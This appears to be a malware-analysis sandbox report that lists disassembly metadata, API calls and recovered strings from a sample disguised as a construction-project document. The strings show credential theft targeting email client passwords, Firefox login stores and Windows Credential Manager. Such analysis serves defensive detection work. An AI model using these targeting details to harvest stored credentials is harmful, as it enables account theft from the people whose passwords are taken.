                                                                                                                          • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                          • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                          • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004024F5
                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,?,?,?,75A8EB20,?,00000000), ref: 00402533
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$QueryValuememset
                                                                                                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                          • API String ID: 168965057-606283353
                                                                                                                          • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                          • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                          • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                          • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                                                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                                                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                                                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401226
                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401253
                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                                                                          • ShowWindow.USER32(00000000), ref: 00401262
                                                                                                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                                                                          • memset.MSVCRT ref: 0040128E
                                                                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                                                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                                                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2998058495-0
                                                                                                                          • Opcode ID: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                          • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                                          • Opcode Fuzzy Hash: 1304d1c8d715b31a593d177d1fcf49c0df4ecd0a9b3deb669dc5f6aa527f4ccf
                                                                                                                          • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                          • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                                          • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                                          • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                                          • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                                          • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                                          • API String ID: 231171946-2189169393
                                                                                                                          • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                          • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                                          • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                                          • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                          • API String ID: 633282248-1996832678
                                                                                                                          • Opcode ID: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                          • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                                          • Opcode Fuzzy Hash: 3118318c37942661f5fcffc3ac6ba245d9ce7bfece0bd670dd31aaefef13242f
                                                                                                                          • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: sprintf$memset$_mbscpy
                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                          • API String ID: 3402215030-3842416460
                                                                                                                          • Opcode ID: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                          • Opcode Fuzzy Hash: ea23fa7928f637b81322df5704cb4e79e7cdaf63d3e69134c948d1ddb26e9ea3
                                                                                                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                                            • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                            • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                          • strlen.MSVCRT ref: 0040F139
                                                                                                                          • strlen.MSVCRT ref: 0040F147
                                                                                                                          • memset.MSVCRT ref: 0040F187
                                                                                                                          • strlen.MSVCRT ref: 0040F196
                                                                                                                          • strlen.MSVCRT ref: 0040F1A4
                                                                                                                          • memset.MSVCRT ref: 0040F1EA
                                                                                                                          • strlen.MSVCRT ref: 0040F1F9
                                                                                                                          • strlen.MSVCRT ref: 0040F207
                                                                                                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                          • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                          • API String ID: 2003275452-3138536805
                                                                                                                          • Opcode ID: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                                          • Opcode Fuzzy Hash: 902799fa4b1ae56d660fb5b5f253a280b97e2ca6f8806fc11f1a2088d22d41ab
                                                                                                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C3F7
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                          • strrchr.MSVCRT ref: 0040C417
                                                                                                                          • _mbscat.MSVCRT ref: 0040C431
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                          • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                          • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                          • API String ID: 1012775001-1343505058
                                                                                                                          • Opcode ID: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                                          • Opcode Fuzzy Hash: 9e23aae614ac24114fc18125b019b65eb6573faab22d4a721f00cae62469f9bb
                                                                                                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00444612
                                                                                                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                          • strlen.MSVCRT ref: 0044462E
                                                                                                                          • memset.MSVCRT ref: 00444668
                                                                                                                          • memset.MSVCRT ref: 0044467C
                                                                                                                          • memset.MSVCRT ref: 00444690
                                                                                                                          • memset.MSVCRT ref: 004446B6
                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                            • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                          • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                          • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                          • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                          • String ID: salu
                                                                                                                          • API String ID: 3691931180-4177317985
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                          • API String ID: 2449869053-232097475
                                                                                                                          APIs
                                                                                                                          • sprintf.MSVCRT ref: 0040957B
                                                                                                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                          • sprintf.MSVCRT ref: 004095EB
                                                                                                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                          • memset.MSVCRT ref: 0040961C
                                                                                                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                          • String ID: caption$dialog_%d$menu_%d
                                                                                                                          • API String ID: 3259144588-3822380221
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$Library$FreeLoad
                                                                                                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                          • API String ID: 2449869053-4258758744
                                                                                                                          APIs
                                                                                                                          • wcsstr.MSVCRT ref: 0040426A
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                          • strchr.MSVCRT ref: 004042F6
                                                                                                                          • strlen.MSVCRT ref: 0040430A
                                                                                                                          • sprintf.MSVCRT ref: 0040432B
                                                                                                                          • strchr.MSVCRT ref: 0040433C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                          • String ID: %s@gmail.com$www.google.com
                                                                                                                          • API String ID: 3866421160-4070641962
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                          APIs
                                                                                                                          • strchr.MSVCRT ref: 004100E4
                                                                                                                          • _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                          • _mbscpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 00410142
                                                                                                                          • _mbscat.MSVCRT ref: 0041014D
                                                                                                                          • memset.MSVCRT ref: 00410129
                                                                                                                            • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                                            • Part of subcall function 0040715B: _mbscpy.MSVCRT(00000000,0045AA00,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407180
                                                                                                                          • memset.MSVCRT ref: 00410171
                                                                                                                          • memcpy.MSVCRT(?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0041018C
                                                                                                                          • _mbscat.MSVCRT ref: 00410197
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                          • String ID: \systemroot
                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                          • Opcode ID: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                          • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                                                          • Opcode Fuzzy Hash: 6597b15a16a773eef37e6b590fdc8d99fee9a87505121146da4ae3bca3d5ad9a
                                                                                                                          • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
